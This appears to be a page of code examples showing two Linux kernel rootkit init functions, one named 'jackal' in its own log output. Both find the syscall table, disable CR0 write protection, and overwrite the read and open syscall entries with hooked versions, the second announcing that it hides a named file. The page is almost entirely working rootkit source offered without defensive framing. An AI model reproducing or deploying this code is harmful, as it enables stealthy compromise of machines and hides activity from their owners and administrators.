示例#1
0
static int __init rootkit_start(void)
{
    // Find the syscall table in memory
    if(!(sys_call_table = aquire_sys_call_table()))
        return -1;

    // record the initial value in the cr0 register
    original_cr0 = read_cr0();
    // set the cr0 register to turn off write protection
    write_cr0(original_cr0 & ~0x00010000);
    // copy the old read call
    ref_sys_read = (void *)sys_call_table[__NR_read]; 
    // write our modified read call to the syscall table
    sys_call_table[__NR_read] = (unsigned long *)new_sys_read;
    // turn memory protection back on
    write_cr0(original_cr0);

    return 0;
}
示例#2
0
static int __init jackle_start( void ) {
    
    printk( KERN_INFO "[+]  J A C K A L\n" );
    if( !( sys_call_table = aquire_sys_call_table() ) )
        return -1;
    original_cr0 = read_cr0();
    printk( KERN_INFO " |- Aquired sys_call_table\n" );

    write_cr0( original_cr0 & ~0x00010000 );
    printk( KERN_INFO " |- Unlocked table!!\n" );

    ref_sys_read = ( void * )sys_call_table[__NR_read];
    ref_sys_open = ( void * )sys_call_table[__NR_open];

    sys_call_table[__NR_read] = ( unsigned long * )new_sys_read;
    printk( KERN_INFO " |- Patched sys_read\n" );
    sys_call_table[__NR_open] = ( unsigned long * )new_sys_open;
    printk( KERN_INFO " |- Patched sys_open\n" );
    printk( KERN_INFO " |  ` hiding %s\n", file_to_hide );
    write_cr0( original_cr0 );

    return 0;
}